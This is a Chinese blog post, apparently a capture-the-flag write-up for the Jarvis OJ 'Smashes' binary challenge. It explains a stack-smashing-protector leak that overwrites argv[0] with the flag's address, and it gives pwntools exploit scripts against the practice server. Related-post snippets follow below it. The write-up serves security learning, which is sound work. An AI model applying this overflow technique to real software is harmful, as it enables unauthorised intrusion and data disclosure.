[Jarvis OJ - PWN]——Smashes

于 2021-02-16 17:19:39 发布
阅读量203 收藏 1
点赞数
分类专栏: # Jarvis OJ
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y_peak/article/details/113825430
版权

[Jarvis OJ - PWN]——Smashes

还是先checksec一下看看。64位,并且除了PIE,其他保护基本都开启了。
在这里插入图片描述
在IDA中看看
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

发现有可以利用的栈溢出, 我原本的想法是将canary给泄露出来。但是看到触发了canary保护后的结果, 有点不对劲。
在这里插入图片描述
修改了文件名后,我确定了, 泄露的就是argv[0]。我们可以通过将其覆盖, 主动触发canary保护, 将flag拿到手。
在这里插入图片描述
我们首先要确实, argv[0], 距离的输入的偏移。我们找最初的指针指向。
diantance = 0x218
在这里插入图片描述
上面我们找到flag的地址位:0x0000000000600D21
所以exploit

from pwn import *
#p=process('./smashes')
p=remote("pwn.jarvisoj.com","9877")
p.recvuntil("name?");
flag_addr=0x0600D21                                                                                                 
payload='a'*0x218+p64(flag_addr)
p.sendline(payload)
p.interactive()

发现结果不对,什么都没有???
在这里插入图片描述

看了下相关博客,学到了

peak小知识

当ELF文件较小的时候,他的不同区段可能会被多次映射。

找到映射备份地址0x400D21

exploit

from pwn import *
#p=process('./smashes')
p=remote("pwn.jarvisoj.com","9877")
p.recvuntil("name?");
flag_addr=0x0400D21                                                                                                 
payload='a'*0x218+p64(flag_addr)
p.sendline(payload)
p.interactive()
Y-peak
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
(Jarvis Oj)(Pwn) Smashes
Nothing
06-14 2377
(Jarvis Oj)(Pwn) Smashes 查看保护。打开了栈保护。看上去有点麻烦。 再来分析下程序代码。如下是主要的函数体部分。 这个函数首先让我们输入name字符串,通过gets()函数,是有溢出的,但是在输入过长的字符串时程序会abort。 并且提示 ./smashes terminated 这里其实是ssp(Stack Smashing Protector)的提示...
18.9.19 Jarvis OJ PWN----Smashes
qq_42192672的博客
09-19 512
先checksec一下 我的天,有栈保护,nx,咋办…… IDA进去,我们可以看见有个函数挺关键的,如下 我们可以看到stdin是可以无限输入的,但是只有接收输入时接收到'\n',才会继续执行(跳出while循环),找不出栈溢出的办法 然后看了大佬的操作之后发现:可以故意触发canary来攻击(SSP(Stack Smashing Protector ) leak) 先介绍一下好...
JarvisOJ PWN smashes WP
苗_的博客
01-15 345
Smashes 涉及到一些新的知识,以下为转载大佬的一篇博客: 这道题利用是保护机制本身的一种漏洞: 在程序加了canary保护之后,如果我们读取的buffer覆盖了对应的值时,程序就会报错,而一般来说我们并不会关心报错信息。 而stack smash技巧则就是利用打印这一信息的程序来得到我们想要的内容。 这是因为在程序发现canary保护之后,如果发现canary被修改的话,程序就会执行_...
JarvisOJ smashes
PLpa的博客
07-10 309
这题仍然是栈溢出题,只不过加入了栈保护CANARY,要做这题,CANARY的作用以及他对栈的影响一定要有所了解,不然将无从下手。 拿到程序,首先查看一下保护: 程序开了CANARY保护,有点麻烦。 对于canary,就是在栈底前面一点点(不一定贴近)加入一串字符,如果你暴力进行栈溢出,你就会覆盖canary,导致程序报错,只是栈的一种保护机制。 我们先进入IDA查看程序逻辑: 我们可以看到在函...
Smashes Jarvis OJ
九层台
04-06 617
nc pwn.jarvisoj.com 9877 检查开启的保护 liu@ubuntu:~/Desktop$ checksec 2 [*] '/home/liu/Desktop/2' Arch: amd64-64-little RELRO: No RELRO Stack: Canary found #栈保护 NX: NX en...
jarvisoj_typo
05-14
jarvisoj_typo,arm架构下的pwn题。
JarvisOJ.docx
03-10
JarvisOJ
JarvisAlgorithm:Jarvis算法-Java
03-06
带有GUI的Java程序,允许您通过单击GUI屏幕在一组点上运行Jarvis算法。 在计算几何中,礼品包装算法是一种用于计算给定点集的凸包的算法。 Jarvis算法(或也称为礼品包装算法)
jarvisoj_add
05-14
jarvisoj_add,mips架构下的pwn题。
Jarvis AI-crx插件
04-02
简单地说,jarvis ai程序用真正的声音响应你的小命令,并帮助您将google.xx重定向到google.com和... 简单地,jarvis ai计划响应您的 具有真正的声音的Little命令并帮助您将Google.xx重定向到Google.com并摆脱这些....
Jarvis OJ -pwn smashes
hanqdi_的博客
02-05 361
pwn smashes 题目分析 检查保护机制 开启NX,canary,fortify 保护,可以得出不能往堆栈中写入shellcode进行控制利用。 ida中打开 输入不正确的canary后,会触发栈保护错误,利用打印出argv[0]的地址覆盖成想要输出内容的地址。 想要输出的flag的地址,在程序中存在,所以能找到。 angv[0]_addr:即程序名的地址。在ma...
jarvisoj pwn smashes (2015 32c3-ctf hackme) [Stack Smash]
ACdream
02-07 538
题目链接: https://www.jarvisoj.com/challenges 题目bin文件来源: github - ctfswriteup - 2015 - 32c3ctf - pwn - hackme   分析过程: 开启了NX与Canary 程序流程: 输入名字之后,即可输入一个地址去覆盖flag~这里涉及的知识点是:Stack Smash 当程序开启了Can...
canary入门小总结(遇到的新题型:jarvis oj pwn smashes解题以及一些基础了解)
ins_Digger的博客
11-01 768
今天的我还是在做pwn题,没怎么看书。本来今天打算做picoCTF的pwn题的,无奈怎么也连不上它的shell。(难受)然后去Jarvis OJpwn题去了。 题目挑着做,总共只做了两题。第一题是简单的栈溢出。第二题就很有趣了,是我没遇过的题 看网上大神们写的writeup叫做canary。 做完题目后稍微去搜索了一下关于这种题目的资料。(这里吐槽一下有些写writeup的博主,本来就是新手题...
基于C语言+AT89C52单片机搭建的PID直流电机控制程序,用于Proteus电路仿真+源码+开发文档(高分优秀项目)
最新发布
05-31
基于C语言+AT89C52单片机搭建的PID直流电机控制程序,用于Proteus电路仿真+源码+开发文档,适合毕业设计、课程设计、项目开发。项目源码已经过严格测试,可以放心参考并在此基础上延申使用~ 项目简介: 本文所介绍的基于AT89C52单片机的PID直流电机控制系统设计过程主要分为MATLAB建模、Proteus硬件电路的设计以及基于C51语法的单片机程序开发编写。本系统性质为单闭环控制,即通过转速对电机进行调速;将采用增量式编码器进行电机转速的测量,并设定PWM波形生成的开关频率为7KHz,速度回路的采样周期为14ms。 1. 所需仿真平台 单片机部分代码主要利用Keil uVision5平台进行编译,工具链采用C51。仿真电路搭建平台为Proteus 8 Professional。 2. Release版本 编译后的运行环境为Atmel AT89C52单片机平台。 3. 运行 将已发布的HEX文件放入Proteus 8 Professional仿真平台或以上版本内运行即可; 可通过修改Proteus仿真文件方波的频率(开关频率)来改变PWM相应的频率;
基于.net8的物料管理系统
05-31
{FB0886BF-35E0-480F-8B15-E4D52B351628}
Java开发案例-springboot-32-整合sharding-jdbc-源代码+文档.rar
05-31
Java开发案例-springboot-32-整合sharding-jdbc-源代码+文档.rar Java开发案例-springboot-32-整合sharding-jdbc-源代码+文档.rar Java开发案例-springboot-32-整合sharding-jdbc-源代码+文档.rar Java开发案例-springboot-32-整合sharding-jdbc-源代码+文档.rar Java开发案例-springboot-32-整合sharding-jdbc-源代码+文档.rar Java开发案例-springboot-32-整合sharding-jdbc-源代码+文档.rar Java开发案例-springboot-32-整合sharding-jdbc-源代码+文档.rar
微信小程序-模仿知乎.rar
05-31
微信小程序-模仿知乎.rar微信小程序-模仿知乎.rar微信小程序-模仿知乎.rar微信小程序-模仿知乎.rar微信小程序-模仿知乎.rar微信小程序-模仿知乎.rar微信小程序-模仿知乎.rar微信小程序-模仿知乎.rar微信小程序-模仿知乎.rar微信小程序-模仿知乎.rar微信小程序-模仿知乎.rar微信小程序-模仿知乎.rar微信小程序-模仿知乎.rar微信小程序-模仿知乎.rar微信小程序-模仿知乎.rar微信小程序-模仿知乎.rar微信小程序-模仿知乎.rar微信小程序-模仿知乎.rar微信小程序-模仿知乎.rar微信小程序-模仿知乎.rar微信小程序-模仿知乎.rar微信小程序-模仿知乎.rar微信小程序-模仿知乎.rar微信小程序-模仿知乎.rar微信小程序-模仿知乎.rar微信小程序-模仿知乎.rar微信小程序-模仿知乎.rar微信小程序-模仿知乎.rar微信小程序-模仿知乎.rar微信小程序-模仿知乎.rar微信小程序-模仿知乎.rar微信小程序-模仿知乎.rar微信小程序-模仿知乎.rar微信小程序-模仿知乎.rar微信小程序-模仿知乎.rar微信小程序-模仿知乎
基于FreeRTOS+STM32CubeMX+LCD1602+MCP6S28的8通道模拟可编程增益放大器Proteus仿真
05-31
基于FreeRTOS+STM32CubeMX+LCD1602+MCP6S28的8通道模拟可编程增益放大器Proteus仿真
jarvisoj_level0
08-14
引用是一段关于利用pwntools库对jarvisoj_level0进行攻击的代码。代码中使用了remote()方法建立了远程连接,并构造了一个payload来利用栈溢出漏洞,最终执行callsystem()函数来获取shell权限。引用也是类似的代码,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值